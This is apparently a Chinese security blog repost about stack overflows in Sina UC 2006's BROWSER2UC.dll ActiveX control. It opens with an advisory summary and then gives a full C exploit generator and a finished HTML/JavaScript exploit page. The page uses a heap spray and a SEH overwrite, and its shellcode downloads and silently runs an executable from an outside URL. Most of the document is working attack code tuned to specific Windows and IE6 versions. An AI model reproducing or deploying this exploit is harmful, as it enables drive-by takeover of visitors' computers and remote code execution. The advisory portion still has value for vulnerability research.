Sina UC 2006 Activex SendChatRoomOpt Exploit

鬼仔:我编译了下,下载地址:
2007011012544.rar

来源:Ph4nt0m

//////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 新浪UC ActiveX多个远程栈溢出漏洞
//
// Sowhat of Nevis Labs
// 日期: 2007.01.09
//
// http://www.nevisnetworks.com
// http://secway.org/advisory/20070109EN.txt
// http://secway.org/advisory/20070109CN.txt
//
// CVE: 暂无
//
// 厂商
//
// Sina Inc.
//
// 受影响的版本:
// Sina UC <=UC2006
//
// Overview:
// 新浪UC是中国非常流行的IM工具之一
//
// http://www.51uc.com
//
// 细节:
//
// 漏洞的起因是Sina UC的多个ActiveX控件的参数缺乏必要的验证,攻击者构造恶意网页,可以远程完全控制安装了Sina UC
// 的用户的计算机,
//
// 多个控件存在栈溢出问题,包括但不限于:
//
// 1. clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384
// C:\Program Files\sina\UC\ActiveX\BROWSER2UC.dll
//
// Sub SendChatRoomOpt (
// ByVal astrVerion As String ,
// ByVal astrUserID As String ,
// ByVal asDataType As Integer ,
// ByVal alTypeID As Long
// )
//
// 当第1个参数是一个超常字符串时,发生栈溢出,SEH被覆盖,攻击者可以执行任意代码
//////////////////////////////////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Sina UC 2006 Activex SendChatRoomOpt Exploit
// Code by 云舒 & LuoLuo,ph4nt0morg
//////////////////////////////////////////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>

FILE *fp = NULL;
char *file = "fuck_uc.html";
char *url = NULL;

unsigned char sc[] =
"\x60\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x70"
"\x08\x81\xec\x00\x04\x00\x00\x8b\xec\x56\x68\x8e\x4e\x0e\xec\xe8"
"\xff\x00\x00\x00\x89\x45\x04\x56\x68\x98\xfe\x8a\x0e\xe8\xf1\x00"
"\x00\x00\x89\x45\x08\x56\x68\x25\xb0\xff\xc2\xe8\xe3\x00\x00\x00"
"\x89\x45\x0c\x56\x68\xef\xce\xe0\x60\xe8\xd5\x00\x00\x00\x89\x45"
"\x10\x56\x68\xc1\x79\xe5\xb8\xe8\xc7\x00\x00\x00\x89\x45\x14\x40"
"\x80\x38\xc3\x75\xfa\x89\x45\x18\xe9\x08\x01\x00\x00\x5e\x89\x75"
"\x24\x8b\x45\x04\x6a\x01\x59\x8b\x55\x18\x56\xe8\x8c\x00\x00\x00"
"\x50\x68\x36\x1a\x2f\x70\xe8\x98\x00\x00\x00\x89\x45\x1c\x8b\xc5"
"\x83\xc0\x50\x89\x45\x20\x68\xff\x00\x00\x00\x50\x8b\x45\x14\x6a"
"\x02\x59\x8b\x55\x18\xe8\x62\x00\x00\x00\x03\x45\x20\xc7\x00\x5c"
"\x7e\x2e\x65\xc7\x40\x04\x78\x65\x00\x00\xff\x75\x20\x8b\x45\x0c"
"\x6a\x01\x59\x8b\x55\x18\xe8\x41\x00\x00\x00\x6a\x07\x58\x03\x45"
"\x24\x33\xdb\x53\x53\xff\x75\x20\x50\x53\x8b\x45\x1c\x6a\x05\x59"
"\x8b\x55\x18\xe8\x24\x00\x00\x00\x6a\x00\xff\x75\x20\x8b\x45\x08"
"\x6a\x02\x59\x8b\x55\x18\xe8\x11\x00\x00\x00\x81\xc4\x00\x04\x00"
"\x00\x61\x81\xc4\xdc\x04\x00\x00\x5d\xc2\x24\x00\x41\x5b\x52\x03"
"\xe1\x03\xe1\x03\xe1\x03\xe1\x83\xec\x04\x5a\x53\x8b\xda\xe2\xf7"
"\x52\xff\xe0\x55\x8b\xec\x8b\x7d\x08\x8b\x5d\x0c\x56\x8b\x73\x3c"
"\x8b\x74\x1e\x78\x03\xf3\x56\x8b\x76\x20\x03\xf3\x33\xc9\x49\x41"
"\xad\x03\xc3\x56\x33\xf6\x0f\xbe\x10\x3a\xf2\x74\x08\xc1\xce\x0d"
"\x03\xf2\x40\xeb\xf1\x3b\xfe\x5e\x75\xe5\x5a\x8b\xeb\x8b\x5a\x24"
"\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5"
"\x5e\x5d\xc2\x08\x00\xe8\xf3\xfe\xff\xff\x55\x52\x4c\x4d\x4f\x4e"
"\x00";

char * header =
"<!--\n"
"clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384\n"
"C:\\Program Files\\sina\\UC\\ActiveX\\BROWSER2UC.dll\n\n"

"Sub SendChatRoomOpt (\n"
" ByVal astrVerion As String ,\n"
" ByVal astrUserID As String ,\n"
" ByVal asDataType As Integer ,\n"
" ByVal alTypeID As Long\n"
")\n\n"
"ph4nt0m.org, Code By 云舒 & LuoLuo\n"
"!-->\n\n"
"<html>\n"
"<head>\n"
"<script language=\"javascript\">\n"
"var heapSprayToAddress = 0x0c0c0c0c;\n"
"var shellcode = unescape(\"%u9090\"+\"%u9090\"+ \n";

char * footer =
"\n"
"var heapBlockSize = 0x100000;\n"
"var payLoadSize = shellcode.length * 2;\n"
"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);\n"
"var spraySlide = unescape(\"%u9090%u9090\");\n\n"
"spraySlide = getSpraySlide(spraySlide,spraySlideSize);\n"
"heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;\n"
"memory = new Array();\n\n"
"for (i=0;i<heapBlocks;i++)\n{\n"
"\t\tmemory[i] = spraySlide + shellcode;\n}\n"

"function getSpraySlide(spraySlide, spraySlideSize)\n{\n\t"
"while (spraySlide.length*2<spraySlideSize)\n\t"
"{\n\t\tspraySlide += spraySlide;\n\t}\n"
"\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\n\treturn spraySlide;\n}\n\n";

// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
  int i;
  for(i=0;i < buffsize;i+=2)
  {
    if((i%16)==0)
    {
      if(i!=0)
      {
        fprintf(fp, "%s", "\" +\n\"");
      }
      else
      {
        fprintf(fp, "%s", "\"");
      }
    }
    fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
  }
  //把shellcode打印在header后面,然后用 " ) " 闭合
  fprintf(fp, "%s", "\");\n");
}

int main( int argc, char *argv[] )
{
  if( argc != 3 )
  {
    printf( "\nUC ActiveX object exp,Code by 云舒 & LuoLuo,ph4nt0morg\n" );
    printf( "Usage: %s <url> <os>\n", argv[0] );
    printf( " 1 Windows XP SP2 Chinese version,IE 6\n" );
    printf( " 2 Windows 2003 standard SP1 Chinese Version, IE 6\n" );
    
    return -1;
  }
  
  char  seh[1024] = { 0 };
  int    os = atoi( argv[2] );
  int    len = 0;
  
  if( os == 1 )
  {
    len = 3133;
  }
  else if( os == 2 )
  {
    len = 3193;
  }
  
  sprintf( seh , "var obj = new ActiveXObject(\"BROWSER2UC.BROWSERToUC\");\n\tvar arg1;\n\n<!-- Windows2003 standard SP1 + IE6 此处覆盖长度i为3193 -->\n<!-- Windows XP SP2 + IE6 此处覆盖长度i为3133 -->\n\nfor( var i = 0; i < %d; i ++ )\n{\targ1 += \"A\";\n}arg1=arg1 + unescape(\"%%0c%%0c%%0c%%0c\");\narg2=\"defaultV\";\narg3=1;\narg4=1;\nobj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4);\n</script>\n</head>\n</html>", len );
  
  url = argv[1];
  if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
  {
    printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
    return -1;
  }

  printf("[+] download url:%s\n", url);

  fp = fopen( file , "w" );
  if( fp == NULL )
  {
    printf( "Create file error: %d\n", GetLastError() );
    return -1;
  }
  fprintf( fp, "%s", header );
  fflush( fp );
  
  char  buffer[4096] = { 0 };
  int    sc_len = sizeof(sc)-1;
  memcpy(buffer, sc, sc_len);
  memcpy(buffer+sc_len, url, strlen(url));

  sc_len += strlen(url)+1;
  PrintPayLoad((char *)buffer, sc_len);
  fflush( fp );
  
  fprintf( fp, "%s", footer );
  fprintf( fp, "%s", seh );
  
  fflush( fp );
  fclose( fp );

  printf( "Create done!please look %s\n", file );
}

UC BROWSER2UC.dll溢出演示代码
今天和LuoLuo测试了下,写成了这个测试代码。网页会下载我blog的http://icylife.net/1.exe,这个是记事本,下载到system32保存为~.exe并后台运行。生成器晚上再写哈,朕饿了。

这个我们测试了
<!– Windows2003 standard SP1 + IE6 此处覆盖长度i为3193 –>
<!– Windows XP SP2 + IE6 此处覆盖长度i为3133 –>

不过IE7还不能利用,晚上再加通过JS判断系统类型的部分,这样就不用修改i的值了,现在针对系统需要修改。


<!--

1. clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384
C:Program FilessinaUCActiveXBROWSER2UC.dll

Sub SendChatRoomOpt (
ByVal astrVerion As String ,
ByVal astrUserID As String ,
ByVal asDataType As Integer ,
ByVal alTypeID As Long
)

Code By 云舒 & LuoLuo
! -->

<html>
<head>
<script language="javascript">
var heapSprayToAddress = 0x0c0c0c0c;
var shellcode = unescape("%u9090"+"%u9090"+
"%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b" +
"%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec" +
"%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1" +
"%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000" +
"%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589" +
"%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014" +
"%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589" +
"%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000" +
"%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b" +
"%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14" +
"%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00" +
"%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45" +
"%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503" +
"%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905" +
"%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845" +
"%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004" +
"%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352" +
"%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2" +
"%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73" +
"%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149" +
"%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce" +
"%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a" +
"%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503" +
"%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f" +
"%u6800%u7474%u3a70%u2f2f%u6369%u6c79%u6669%u2e65" +
"%u656e%u2f74%u2e31%u7865%u0065");

var heapBlockSize = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;
memory = new Array();

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + shellcode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

var obj = new ActiveXObject("BROWSER2UC.BROWSERToUC");
var arg1;

<!-- Windows2003 standard SP1 + IE6 此处覆盖长度i为3193 -->
<!-- Windows XP SP2 + IE6 此处覆盖长度i为3133 -->
for( var i = 0; i < 3133; i ++ )
{
arg1 += "A";
}

arg1=arg1 + unescape("%0c%0c%0c%0c");
arg2="defaultV";
arg3=1;
arg4=1;
obj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4);
</script>
</head>
</html>

相关日志

发表评论